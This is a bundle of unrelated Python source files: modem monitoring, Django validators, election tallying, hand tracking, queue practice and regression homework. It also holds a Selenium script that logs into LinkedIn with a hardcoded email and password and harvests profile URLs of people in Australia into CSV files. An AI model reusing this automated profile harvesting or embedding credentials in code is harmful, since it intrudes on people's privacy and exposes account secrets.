logger.error("Modem task failed: could not retrieve " + get_dev_info_api_url)
net_name_resp = requests.get(get_net_name_api_url, headers=headers)
if "FullName" in net_name_resp.text:
net_name = xmltodict.parse(net_name_resp.content)['response']
global_vars.modem_data["network_name"] = net_name["FullName"]
else:
logger.error("Modem task failed: could not retrieve " + get_net_name_api_url)
mon_stat_resp = requests.get(get_mon_stat_api_url, headers=headers)
if "ConnectionStatus" in mon_stat_resp.text:
mon_stat = xmltodict.parse(mon_stat_resp.content)['response']
global_vars.modem_data["signal_strength"] = int(mon_stat["SignalIcon"])
global_vars.modem_data["wan_ip"] = mon_stat["WanIPAddress"]
                net_type_ex = int(mon_stat["CurrentNetworkTypeEx"])
                # map Huawei CurrentNetworkTypeEx codes to readable names
                net_type_names = {
                    0: "No Service", 1: "GSM", 2: "GPRS", 3: "EDGE",
                    41: "WCDMA", 42: "HSDPA", 43: "HSUPA", 44: "HSPA",
                    45: "HSPA+", 46: "HSPA+", 62: "HSDPA", 63: "HSUPA",
                    64: "HSPA", 65: "HSPA+", 101: "LTE",
                }
                global_vars.modem_data["network_type"] = net_type_names.get(net_type_ex, "Unknown")
                # ConnectionStatus 901 means the modem is connected
                global_vars.modem_data["connected"] = mon_stat["ConnectionStatus"] == "901"
else:
logger.error("Modem task failed: could not retrieve " + get_mon_stat_api_url)
mon_traf_resp = requests.get(get_mon_traf_api_url, headers=headers)
if "CurrentConnectTime" in mon_traf_resp.text:
mon_traf = xmltodict.parse(mon_traf_resp.content)['response']
global_vars.modem_data["data_usage"]["current"]["up"] = int(mon_traf["CurrentUpload"])
global_vars.modem_data["data_usage"]["current"]["down"] = int(mon_traf["CurrentDownload"])
global_vars.modem_data["data_usage"]["current"]["rate_up"] = int(mon_traf["CurrentUploadRate"])
global_vars.modem_data["data_usage"]["current"]["rate_down"] = int(mon_traf["CurrentDownloadRate"])
global_vars.modem_data["data_usage"]["current"]["connected_time"] = int(mon_traf["CurrentConnectTime"])
global_vars.modem_data["data_usage"]["total"]["up"] = int(mon_traf["TotalUpload"])
global_vars.modem_data["data_usage"]["total"]["down"] = int(mon_traf["TotalDownload"])
global_vars.modem_data["data_usage"]["total"]["connected_time"] = int(mon_traf["TotalConnectTime"])
else:
logger.error("Modem task failed: could not retrieve " + get_mon_traf_api_url)
mon_data_stats_resp = requests.get(get_mon_data_stats_api_url, headers=headers)
if "MonthDuration" in mon_data_stats_resp.text:
mon_data_stats = xmltodict.parse(mon_data_stats_resp.content)['response']
global_vars.modem_data["data_usage"]["month"]["up"] = int(mon_data_stats["CurrentMonthUpload"])
global_vars.modem_data["data_usage"]["month"]["down"] = int(mon_data_stats["CurrentMonthDownload"])
global_vars.modem_data["data_usage"]["month"]["connected_time"] = int(mon_data_stats["MonthDuration"])
else:
logger.error("Modem task failed: could not retrieve " + get_mon_data_stats_api_url)
mon_data_plan_resp = requests.get(get_mon_data_plan_api_url, headers=headers)
if "StartDay" in mon_data_plan_resp.text:
mon_data_plan = xmltodict.parse(mon_data_plan_resp.content)['response']
global_vars.modem_data["data_usage"]["month"]["start_day"] = int(mon_data_plan["StartDay"])
global_vars.modem_data["data_usage"]["month"]["limit"] = int(mon_data_plan["trafficmaxlimit"])
else:
logger.error("Modem task failed: could not retrieve " + get_mon_data_plan_api_url)
    except Exception as e:
        logger.error("Modem task failed: " + str(e))
def send_sms(dest,message):
send_sms_api_url="http://" + config['huawei']['dongle_ip'] + "/api/sms/send-sms"
try:
auth_data=get_auth_data()
if auth_data:
headers = construct_auth_headers(auth_data)
xml_data = """<?xml version='1.0' encoding='UTF-8'?>
<request><Index>-1</Index><Phones><Phone>""" + dest + \
"""</Phone></Phones><Sca></Sca><Content>""" + message + \
"""</Content><Length>-1</Length><Reserved>1</Reserved>
<Date>-1</Date></request>"""
send_sms_resp = requests.post(send_sms_api_url, data=xml_data, headers=headers)
if "OK" in send_sms_resp.text:
logger.warning("SMS sent to " + dest)
return True
else:
logger.error("SMS send failed: " + send_sms_resp.text)
return False
except Exception as e:
logger.error("SMS send failed: " + str(e))
return False
def net_connected():
try:
if global_vars.modem_data["connected"] and global_vars.modem_data["data_usage"]["current"]["connected_time"]:
return True
else:
return False
except Exception as e:
logger.error("Connection check failed: " + str(e))
return False
def connection_checker():
    if not net_connected():
        logger.warning("Modem is not connected!")
        send_connection_req()
# If this file is run directly, check and keep the lte connection alive
def main():
load_config()
while True:
sleep(5)
get_modem_data()
connection_checker()
if __name__ == '__main__':
from yaml_config import load_config
main()
|
[
"root@frillip.com"
] |
root@frillip.com
|
7c99fc847d229c37303986261ca215365661c576
|
f76b6755dedfdcc78ea794ae47cf25006539a70b
|
/src/restaurants/validators.py
|
31756343b9e1a23fef28bda8bb05907e5542c897
|
[] |
no_license
|
ericliu1990/trydjango1-11
|
22b2542bebce88ab73b49c84b2926b590f97b90c
|
62fefcbc54f6bb51458c4d52cda77a36de2f6f07
|
refs/heads/master
| 2022-10-29T04:36:51.909336
| 2018-07-08T11:02:49
| 2018-07-08T11:02:49
| 136,959,340
| 0
| 1
| null | 2022-10-08T21:53:33
| 2018-06-11T17:31:28
|
Python
|
UTF-8
|
Python
| false
| false
| 599
|
py
|
from django.core.exceptions import ValidationError
def validate_even(value):
if value % 2 != 0:
raise ValidationError(
'%(value)s is not an even number',
params={'value': value},
)
# def clean_email(value):
# email = value
# if ".edu" in email:
# raise forms.ValidationError("We do not accept edu emails")
CATEGORIES = ['Mexico', 'western', 'Asian', 'Unknown']
def validate_category(value):
    cat = value.capitalize()
    if value not in CATEGORIES and cat not in CATEGORIES:
        raise ValidationError(f"{value} is not a valid category")
|
[
"liuyuanzhe1990@gmail.com"
] |
liuyuanzhe1990@gmail.com
|
551ee0b90811398f10ba839d1ac6c9fe209d7abd
|
98f569d829cc8389f123f7c0673f9d20080dd090
|
/linkedintest/profileURLScraper.py
|
dc496d692efd7971f143379cf86430c9df2d4e36
|
[
"MIT",
"Apache-2.0"
] |
permissive
|
1kyte/Linkedin-Analysis
|
be491aef889ccfb0d5b1ad660172c579e4f842ff
|
091e0bcd5a7394cbc5e4bfa90d9cae529032ada6
|
refs/heads/master
| 2021-09-26T10:00:42.048185
| 2018-10-28T22:13:40
| 2018-10-28T22:13:40
| 143,820,287
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,626
|
py
|
import re, time, json,csv
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import WebDriverException
from bs4 import BeautifulSoup
urlLists = []
got = []
length = 0
page = 2
def opendrive():
global got,length
try:
driver = webdriver.Firefox(executable_path = '/Users/PaulaZ/Downloads/geckodriver')
driver.get("https://www.linkedin.com/?trk=brandpage_baidu_pc-mainlink")
driver.find_element_by_id('login-email').send_keys("analysisZ@outlook.com")
driver.find_element_by_id('login-password').send_keys("pa$$w0rd")
driver.find_element_by_xpath('//*[@id="login-submit"]').click()
url = 'https://www.linkedin.com/in/lucinda-dalla-riva-65371685/'
getToThePage(driver, url)
got.append(url)
length+=1
for u in urlLists:
for us in u:
getToThePage(driver, us[0])
    except (NoSuchElementException, WebDriverException) as message:
        print(message)
finally:
driver.close()
def checkLocation(obs):
try:
locationTag = obs.find_all('h3',{'class':'pv-top-card-section__location t-16 t-black--light t-normal mt1 inline-block'})
if not locationTag ==[]:
for l in locationTag:
l1 = re.findall(r'\n\s*.*\n',str(l))
l2 = str(l1[0]).strip().strip('\\n\s')
                print(l2)
if 'Australia' in l2 or 'au' in l2 or 'AU' in l2 or 'Melbourne' in l2 or 'VIC' in l2 or 'Victoria' in l2 or 'victoria' in l2:
return True
else:
return False
else:
return True
    except (NoSuchElementException, WebDriverException) as message:
        print(message)
def getToThePage(driver,url):
try:
global urlLists,got,length,page
driver.get(url)
scrollDown(driver)
obs = BeautifulSoup(driver.page_source,'lxml')
urlList = obs.find_all('a',{'class':'pv-browsemap-section__member ember-view'})
if not urlList == []:
urls=[]
for u in urlList:
u1 = re.findall(r'href=.*/\"',str(u))
u2 = str(u1[0]).lstrip('href=\"')
u3 = str(u2).rstrip('\"')
u4 = 'https://www.linkedin.com'+u3
inAus = checkLocation(obs)
if not u4 in got and inAus:
urls.append([u4])
got.append(u4)
                    print(u4)
            length += len(urls)
            print(length)
if length>500:
page+=1
length=0
with open("collectionBox/theUrl"+str(page)+".csv", "a") as csvfile:
writer = csv.writer(csvfile)
writer.writerows(urls)
csvfile.close()
urlLists.append(urls)
    except (NoSuchElementException, WebDriverException) as message:
        print(message)
def scrollDown(driver):
    # scroll down in 500px steps so lazily loaded content renders
    for y in range(500, 2001, 500):
        driver.execute_script("window.scrollTo(0,%d);" % y)
        time.sleep(3)
# ======================================================================================================================
# Start the system
# ======================================================================================================================
if __name__ == "__main__":
opendrive()
|
[
"paula555@outlook.com"
] |
paula555@outlook.com
|
0b2ceae86908c5f43a045245f4959e7f4e6f1865
|
7615819f1a46c56cd61848b1b60c8bfb39d7c032
|
/PyPoll_Challenge_starter_code.py
|
c8e17c2e99e8f065c937e20a9712afce6f47a1f0
|
[] |
no_license
|
briannaso/Election_Analysis
|
22c2f099f5c13b1933ecfece81ca897d244aca75
|
939465ea706de3f8b28ec327a7a7eca1cbaee76c
|
refs/heads/main
| 2023-07-16T23:53:49.478237
| 2021-09-06T18:38:47
| 2021-09-06T18:38:47
| 401,509,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,229
|
py
|
# -*- coding: UTF-8 -*-
"""PyPoll Homework Challenge Solution."""
# Add our dependencies.
import csv
import os
# Add a variable to load a file from a path.
file_to_load = os.path.join("Resources","election_results.csv")
# Add a variable to save the file to a path.
file_to_save = os.path.join("analysis","election_analysis.txt")
# Initialize a total vote counter.
total_votes = 0
# Candidate Options and candidate votes.
candidate_options = []
candidate_votes = {}
# 1: Create a county list and county votes dictionary.
# Track the winning candidate, vote count and percentage
winning_candidate = ""
winning_count = 0
winning_percentage = 0
# 2: Track the largest county and county voter turnout.
# Read the csv and convert it into a list of dictionaries
with open(file_to_load) as election_data:
reader = csv.reader(election_data)
# Read the header
header = next(reader)
# For each row in the CSV file.
for row in reader:
# Add to the total vote count
total_votes = total_votes + 1
# Get the candidate name from each row.
candidate_name = row[2]
# 3: Extract the county name from each row.
# If the candidate does not match any existing candidate add it to
# the candidate list
if candidate_name not in candidate_options:
# Add the candidate name to the candidate list.
candidate_options.append(candidate_name)
# And begin tracking that candidate's voter count.
candidate_votes[candidate_name] = 0
# Add a vote to that candidate's count
candidate_votes[candidate_name] += 1
# 4a: Write an if statement that checks that the
# county does not match any existing county in the county list.
# 4b: Add the existing county to the list of counties.
# 4c: Begin tracking the county's vote count.
# 5: Add a vote to that county's vote count.
# Save the results to our text file.
with open(file_to_save, "w") as txt_file:
# Print the final vote count (to terminal)
election_results = (
f"\nElection Results\n"
f"-------------------------\n"
f"Total Votes: {total_votes:,}\n"
f"-------------------------\n\n"
f"County Votes:\n")
print(election_results, end="")
txt_file.write(election_results)
# 6a: Write a for loop to get the county from the county dictionary.
# 6b: Retrieve the county vote count.
# 6c: Calculate the percentage of votes for the county.
# 6d: Print the county results to the terminal.
# 6e: Save the county votes to a text file.
# 6f: Write an if statement to determine the winning county and get its vote count.
# 7: Print the county with the largest turnout to the terminal.
# 8: Save the county with the largest turnout to a text file.
# Save the final candidate vote count to the text file.
for candidate_name in candidate_votes:
# Retrieve vote count and percentage
votes = candidate_votes.get(candidate_name)
vote_percentage = float(votes) / float(total_votes) * 100
candidate_results = (
f"{candidate_name}: {vote_percentage:.1f}% ({votes:,})\n")
# Print each candidate's voter count and percentage to the
# terminal.
print(candidate_results)
# Save the candidate results to our text file.
txt_file.write(candidate_results)
# Determine winning vote count, winning percentage, and candidate.
if (votes > winning_count) and (vote_percentage > winning_percentage):
winning_count = votes
winning_candidate = candidate_name
winning_percentage = vote_percentage
# Print the winning candidate (to terminal)
winning_candidate_summary = (
f"-------------------------\n"
f"Winner: {winning_candidate}\n"
f"Winning Vote Count: {winning_count:,}\n"
f"Winning Percentage: {winning_percentage:.1f}%\n"
f"-------------------------\n")
print(winning_candidate_summary)
# Save the winning candidate's name to the text file
txt_file.write(winning_candidate_summary)
|
[
"sosa.brianna8@gmail.com"
] |
sosa.brianna8@gmail.com
|
eac1a4b950941874a711cae6bba923273a58161f
|
65f0e21c9bb8fd08d2bf7a4e0c9c6d900392a7fc
|
/hand_tracking/index.py
|
a50de5d5fa940b446f9240a476415c83c0f7f693
|
[] |
no_license
|
GustavoCunhaLacerda/area51
|
7a6adcb278aea4d06431bc8135a267d190995e73
|
cea7c48ac7467bff2127ef9a5858d850c3cc1420
|
refs/heads/master
| 2023-08-28T08:19:04.133839
| 2021-10-26T22:00:02
| 2021-10-26T22:00:02
| 410,167,035
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,031
|
py
|
# from hand_tracking_module import HandDetector
import hand_tracking_module as htm
import mediapipe as mp
import cv2
import os
import math
def load_images_from_folder(folder):
images = []
for filename in os.listdir(folder):
img = cv2.imread(os.path.join(folder, filename))
if img is not None:
images.append(img)
return images
def resize(img, DESIRED_HEIGHT=480, DESIRED_WIDTH=480):
h, w = img.shape[:2]
if h < w:
return cv2.resize(img, (DESIRED_WIDTH, math.floor(h/(w/DESIRED_WIDTH))))
else:
return cv2.resize(img, (math.floor(w/(h/DESIRED_HEIGHT)), DESIRED_HEIGHT))
def main():
images = load_images_from_folder('./hands')
detector = htm.HandDetector(mode=True)
print(detector)
id = 0
for img in images:
cv2.imshow(f"Image {id}", detector.findHands(resize(img)))
id += 1
index = 2
cv2.imshow(f"Image {id}", detector.findHands(resize(images[index])))
cv2.waitKey(0)
if __name__ == "__main__":
main()
|
[
"gustavocunhalacerda@gmail.com"
] |
gustavocunhalacerda@gmail.com
|
8aaaf878028d89edbb4171b45bd1a09f332f380c
|
59dcec7ca27b49ee2cdd705c2860c4f3e4141609
|
/private/gen_table_xp.py
|
b814ef1af73855dedfcba5d346887db051a18eba
|
[
"LicenseRef-scancode-public-domain"
] |
permissive
|
footballhead/zardwars-revival
|
d0b4faacdb2ac1139942dc2a382607296100dc57
|
a0c97487784c3e19eca01e28b97d9408ba7c0dc7
|
refs/heads/master
| 2021-01-10T11:45:35.755002
| 2019-07-06T00:52:12
| 2019-07-06T00:52:12
| 36,998,305
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 520
|
py
|
#!/usr/bin/env python
import sys
def main():
print("<table><tbody>")
print("<tr><th>LEVEL</th><th>EXP NEEDED</th></tr>")
memo = {}
memo[1] = 100.0
print(f"<tr><td>1</td><td>{int(memo[1])}</td></tr>")
for lvl in range(2, 111):
memo[lvl] = memo[lvl-1] * 1.1
if memo[lvl] > 2000000:
memo[lvl] = 2000000
print(f"<tr><td>{lvl}</td><td>{int(memo[lvl])}</td></tr>")
print("</tbody></table>")
return 0
if __name__ == '__main__':
sys.exit(main())
|
[
"mdhitchens@gmail.com"
] |
mdhitchens@gmail.com
|
b5c5f8e3ab90157f0a3222bf826041a3ef6bcb5b
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/2f9vjBiynkBtF3TBi_5.py
|
2de62cfd6805420701dc4149649d92594859e806
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,072
|
py
|
"""
In this challenge, you must verify the equality of two different values given
the parameters `a` and `b`.
Both the _value_ and _type_ of the parameters need to be equal. The possible
types of the given parameters are:
* Numbers
* Strings
* Booleans (`False` or `True`)
* Special values: `None`
What have you learned so far that will permit you to do two different checks
(value **and** type) with a single statement?
Implement a function that returns `True` if the parameters are equal, and
`False` if they are not.
### Examples
check_equality(1, true) ➞ False
# A number and a boolean: the value and type are different.
check_equality(0, "0") ➞ False
# A number and a string: the type is different.
check_equality(1, 1) ➞ True
# A number and a number: the type and value are equal.
### Notes
* If you get stuck on a challenge, find help in the **Resources** tab.
* If you're _really_ stuck, unlock solutions in the **Solutions** tab.
"""
def check_equality(a, b):
    # `is` tests identity, not equality; compare the types and the values instead
    return type(a) is type(b) and a == b
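# Sanity checks mirroring the docstring examples (hypothetical driver, not part
# of the submitted solution):
# assert check_equality(1, True) is False   # bool vs int
# assert check_equality(0, "0") is False    # int vs str
# assert check_equality(1, 1) is True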
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
f9e0c0f6922c687aff6dd1f02122ff3ea4c8b3f6
|
47a6dc3718ef0945eaa7a3cf3c02fd64d4c6b8df
|
/DataStructAlgo/leetcode/345.py
|
6c13f18dfc37afd9bf721d07bf501595c35fe5d9
|
[] |
no_license
|
NootNootow/ML_Algo_projects
|
158f4994e2daae6d71c2a314d1701861c5151b73
|
873a05a5ce344c82db56317bbd02bf23d9a8eb71
|
refs/heads/main
| 2023-04-19T23:46:30.232961
| 2021-04-28T21:59:09
| 2021-04-28T21:59:09
| 343,967,500
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 414
|
py
|
class Solution:
def reverseVowels(self, s: str) -> str:
if not s: return ""
s = list(s)
vowels = set(['a','A','e','E','i','I','o','O','u','U'])
i,j =0,len(s)-1
while i < j:
while i < j and s[i] not in vowels: i+=1
while j > i and s[j] not in vowels: j-=1
s[i],s[j]=s[j],s[i]
i+=1
j-=1
return ''.join(s)
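# Quick checks (hypothetical driver, not part of the submission):
# Solution().reverseVowels("hello")     -> "holle"
# Solution().reverseVowels("leetcode")  -> "leotcede"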
|
[
"aniruddh20.sxn@gmail.com"
] |
aniruddh20.sxn@gmail.com
|
407ab58ead7a9e41a362509107c5fa28e748f676
|
315af6a46b15e6eff887ae37aff9737286dfc1d8
|
/apps/tienda/migrations/0002_auto_20200810_1608.py
|
29253f72580062c077118e3cd031e748dd3b3228
|
[] |
no_license
|
andresx213/clase
|
b5c8c9b1f2fc4d9fdda180dcfd825f639085d676
|
1d27456e3ef236e2764f363cd3cacd783a69ca7e
|
refs/heads/master
| 2022-11-29T19:38:25.918295
| 2020-08-10T19:52:18
| 2020-08-10T19:52:18
| 286,567,207
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 961
|
py
|
# Generated by Django 3.0.8 on 2020-08-10 14:08
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('maintenance', '0001_initial'),
('tienda', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='cuotas',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('pricio', models.IntegerField()),
],
),
migrations.AddField(
model_name='tienda',
name='cliente',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='maintenance.cliente'),
),
migrations.AddField(
model_name='tienda',
name='cuotas',
field=models.ManyToManyField(to='tienda.cuotas'),
),
]
|
[
"andresortega2015@gmail.com"
] |
andresortega2015@gmail.com
|
70d844bd4f95d34a6aa51e7a2cc32836e4bf8dae
|
b4656ac72b4b6449e28fa6979af84eef63bcf5e8
|
/StacksQueue/Queue.py
|
b44a27465d276da6541ebc3b204385473ebd0f0b
|
[] |
no_license
|
ch317/algos-ds
|
98e2fe8fcf383efd8a2da68b2aff8dca39700cac
|
30e8ef1a4103751822b37e8be78bf64e51335fcb
|
refs/heads/main
| 2023-06-16T19:17:26.797558
| 2021-07-19T16:21:05
| 2021-07-19T16:21:05
| 377,563,906
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,397
|
py
|
class Node:
def __init__(self, data):
self.data = data
self.next = None
class Queue:
def __init__(self):
self.first = None
self.last = None
def add(self, node):
#If list was empty, then we set first and last to this new node added
        if self.first is None:
self.first = node
self.last = node
return
node.next = self.last
self.last = node
def remove(self):
if self.first is None: #Queue is empty
raise TypeError
if self.first == self.last: #Queue has 1 element
self.first = None
self.last = None
return
#If Queue has >=2 elements, we traverse the queue starting from last until we find second to element and update
current = self.last
while current.next != self.first:
current = current.next
#Here current points to the second element of the Queue
current.next = None
self.first = current
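    # Note: nodes only link from last toward first, so remove() walks the whole
    # chain and is O(n); a doubly linked list (a hypothetical change) would make
    # dequeuing O(1).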
def peek(self):
if self.first is None:
raise TypeError
return self.first.data
def isEmpty(self):
return self.first is None
#Last element of the queue is on the left and first element is on the right "a->b->c"
def print(self):
if self.first is None:
print("Empty Queue")
return
current = self.last
queueStr = ""
        while current.next is not None:
queueStr += str(current.data) + "->"
current = current.next
queueStr += str(current.data)
print(queueStr)
# stuff to run always here such as class/def
def testQueue():
#Tests
#1. We create an empty Queue:
node1 = Node(5)
node2 = Node(3)
node3 = Node(2)
#We create the Queue Top: 2->3->5
queue = Queue()
queue.add(node1)
queue.add(node2)
queue.add(node3)
queue.print() #2->3->5
print(queue.peek()) #Print 5
queue.remove() #We delete 5
print(queue.peek()) #Print 3
queue.print() #Print Top: 2->3
print(queue.isEmpty()) #Print False
queue.remove()
queue.remove()
print(queue.isEmpty()) #Print True
queue.print() #Empty queue
if __name__ == "__main__":
# stuff only to run when not called via 'import' here
testQueue()
|
[
"poleadornato@gmail.com"
] |
poleadornato@gmail.com
|
e28e74228f1af21ae745a066e94997e5017c48a7
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03060/s273862278.py
|
42e46ce98c38ed062b3f6706f319584553664cc6
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 317
|
py
|
import sys
import math
import bisect
def main():
n = int(input())
A = list(map(int, input().split()))
B = list(map(int, input().split()))
for i in range(n):
A[i] -= B[i]
ans = 0
for a in A:
if a > 0:
ans += a
print(ans)
if __name__ == "__main__":
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
42ae67ce07d3cfed6b59c006324d5681c7d42706
|
537dcffe30dc5929c93c9af9a9fb096811a224f4
|
/website_sale_delivery_dhub/__manifest__.py
|
ba4959460ca18e44b950b44fa69c97d0c13b8f6c
|
[] |
no_license
|
vidtsin/psbe-digitalhub-v12
|
7b0896da422209113537ffbbfbb7bf38e301cb6a
|
851e6885f51ebe15265cac4d837a856651f21191
|
refs/heads/master
| 2020-07-01T18:04:11.814231
| 2019-08-07T14:00:00
| 2019-08-07T14:00:00
| 201,248,369
| 0
| 1
| null | 2019-08-08T11:55:37
| 2019-08-08T11:55:37
| null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
# -*- coding: utf-8 -*-
{
'name': "website_sale_delivery_dhub",
'summary': "",
'description': """
DHub's eCommerce Customizations
===============================
""",
'author': "Odoo SA",
'website': "http://www.odoo.com",
'category': 'Website',
'version': '1.0',
'depends': ['website_sale_delivery', 'tax_margin'],
'auto_install': True
}
|
[
"herve_delvaux@htomail.com"
] |
herve_delvaux@htomail.com
|
93b7331e9546c59ff029f42ca70839edb26ec064
|
cd91c311196cd3b7209db95a12a7b0bd23099307
|
/plot_data.py
|
17538a78fd7564a4fdf0edb38dda21f9c4ca6d0e
|
[] |
no_license
|
LabNeuroCogDevel/precise_eye_tracking
|
756109c9ff986ba7bffec95c12a022688af8bc5c
|
f68edcdb8ddc14af78ac9f8d19bd2183d2fcabf1
|
refs/heads/master
| 2021-02-25T17:14:24.361096
| 2020-03-10T20:32:00
| 2020-03-10T20:32:00
| 245,459,318
| 0
| 0
| null | 2020-03-06T15:50:22
| 2020-03-06T15:50:21
| null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
#Now it's time to plot the data for a better insight
import matplotlib.pyplot as plt
import numpy as np
def plotting(dic):
    # the argument is a list, so data_format unwraps its first element
dic = data_format(dic)
fig = plt.figure()
ax1 = fig.add_subplot(111)
print(dic)
y_s_center = np.asarray(dic['s_center'])[:, 0]
x_s_center = np.asarray(create_x(len(y_s_center)))
print(x_s_center.size)
print(y_s_center.size)
y_s_loc = np.asarray(dic['s_loc'])[:, 0]
x_s_loc = np.asarray(create_x(len(y_s_loc)))
y_h_center = np.asarray(dic['h_center'])[:, 0]
x_h_center = np.asarray(create_x(len(y_h_center)))
y_h_loc = np.asarray(dic['h_loc'])[:, 0]
x_h_loc = np.asarray(create_x(len(y_h_loc)))
    ax1.scatter(x_s_center, y_s_center, marker = 'd', c='b', label='first')
    ax1.scatter(x_s_loc, y_s_loc, marker = 'o', c='r', label='second')
    ax1.scatter(x_h_center, y_h_center, marker = 'x', c='g', label='third')
    ax1.scatter(x_h_loc, y_h_loc, marker = 'v', c='y', label='fourth')
    ax1.legend()
    plt.show()
#Format the data first
def data_format(dic):
new_dic = {}
new_dic['s_center'] = []
new_dic['s_loc'] = []
new_dic['h_center'] = []
new_dic['h_loc'] = []
    dic = dic[0]
    for i in dic:
        for j in dic[i]:
            if abs(j[0][0] - j[1][0]) < 30:
                new_dic[i].append(j[0])
    return new_dic
def create_x(length):
    return list(range(length))
|
[
"jit29@pitt.edu"
] |
jit29@pitt.edu
|
76c764b02f15869f8e67d49deb461c4fc3b75531
|
6cfe00919ab8c5295c7fb38bb6be73c8dde7d948
|
/transcripton.py
|
403add2dc5ace97399e55eee6b6a2657fa299d7f
|
[] |
no_license
|
ACollectionOfAtoms/rosalind
|
b1232ff2b5a8dce8a15f7109974fdde0f7e46d2e
|
157290c22c81c666cf05e942b7ebd87e47866c35
|
refs/heads/master
| 2021-01-10T20:25:32.795377
| 2015-04-19T14:47:54
| 2015-04-19T14:47:54
| 30,945,822
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 379
|
py
|
def revc():
dna = open('rosalind_dna.txt' , 'r')
strand = ''
revc = ''
for line in dna:
strand += line.strip()
for item in strand:
if item == 'A':
revc += 'T'
if item == 'T':
revc += 'A'
if item == 'C':
revc += 'G'
if item == 'G':
revc += 'C'
    print(revc[::-1])
revc()
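# Quick check (hypothetical file contents, not the Rosalind download): for the
# strand "AAAACCCGGT" the printed reverse complement is "ACCGGGTTTT".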
|
[
"hernandezdavid88@utexas.edu"
] |
hernandezdavid88@utexas.edu
|
608fd6a6fa96f4a39e0b5a1649fce87314daa37b
|
a28fe698a9f1f5278ce32623809f7e107b2cd3b1
|
/MLF/hw4.py
|
ba8544dec2c405a5216cda9a6217294b24c07dd7
|
[
"Apache-2.0"
] |
permissive
|
LeoTsui/ML_NTU
|
d73b7a5b8e950bd0fd75afca77c6196acade3f88
|
35bd197654c5f86f7c24b54a7157d4da6b1967d0
|
refs/heads/master
| 2020-07-10T16:29:04.995522
| 2016-09-08T12:10:45
| 2016-09-08T12:10:45
| 67,688,284
| 9
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,397
|
py
|
#!/usr/bin/env python3
# _*_ coding: utf-8 _*_
"""
Question 13
Experiment with Regularized Linear Regression and Validation
Consider regularized linear regression (also called ridge regression) for classification.
w_reg = argmin_w (λ/N)∥w∥² + (1/N)∥Xw−y∥²,
Run the algorithm on the following data set as D
https://d396qusza40orc.cloudfront.net/ntumlone%2Fhw4%2Fhw4_train.dat
and the following set for evaulating Eout
https://d396qusza40orc.cloudfront.net/ntumlone%2Fhw4%2Fhw4_test.dat
Because the data sets are for classification, please consider only the 0/1 error for all the problems below.
Let λ=10, which of the followings is the corresponding Ein and Eout?
Ein=0.050, Eout=0.045
Question 14
Among log10λ={2,1,0,−1,…,−8,−9,−10}. What is the λ with the minimum Ein? Compute λ and its corresponding Ein and Eout then select the closest answer. Break the tie by selecting the largest λ
log10λ=−8,Ein=0.015,Eout=0.020
Question 15
Among log10λ={2,1,0,−1,…,−8,−9,−10}. What is the λ with the minimum Eout? Compute λ and the corresponding Ein and Eout then select the closest answer. Break the tie by selecting the largest λ.
log10λ=−7,Ein=0.030,Eout=0.015
Question 16
Now split the given training examples in D to the first 120 examples for Dtrain and 80 for Dval.
Ideally, you should randomly do the 120/80 split. Because the given examples are already randomly permuted, however, we would use a fixed split for the purpose of this problem.
Run the algorithm on Dtrain to get g−λ, and validate g−λ with Dval.
Among log10λ={2,1,0,−1,…,−8,−9,−10}. What is the λ with the minimum Etrain(g−λ)? Compute λ and the corresponding Etrain(g−λ), Eval(g−λ) and Eout(g−λ) then select the closet answer. Break the tie by selecting the largest λ.
log10λ=−8,Etrain(g−λ)=0.000,Eval(g−λ)=0.050,Eout(g−λ)=0.025
Question 17
Among log10λ={2,1,0,−1,…,−8,−9,−10}. What is the λ with the minimum Eval(g−λ)? Compute λ and the corresponding Etrain(g−λ), Eval(g−λ) and Eout(g−λ) then select the closet answer. Break the tie by selecting the largest λ.
log10λ=0,Etrain(g−λ)=0.033,Eval(g−λ)=0.038,Eout(g−λ)=0.028
Question 18
Run the algorithm with the optimal λ of the previous problem on the whole D to get gλ. Compute Ein(gλ) and Eout(gλ) then select the closet answer.
Ein(gλ)=0.035,Eout(gλ)=0.020
Question 19
Now split the given training examples in D to five folds, the first 40 being fold 1, the next 40 being fold 2, and so on. Again, we take a fixed split because the given examples are already randomly permuted.
Among log10λ={2,1,0,−1,…,−8,−9,−10}. What is the λ with the minimum Ecv, where Ecv comes from the five folds defined above? Compute λ and the corresponding Ecv then select the closet answer. Break the tie by selecting the largest λ.
log10λ=−8,Ecv=0.030
Question 20
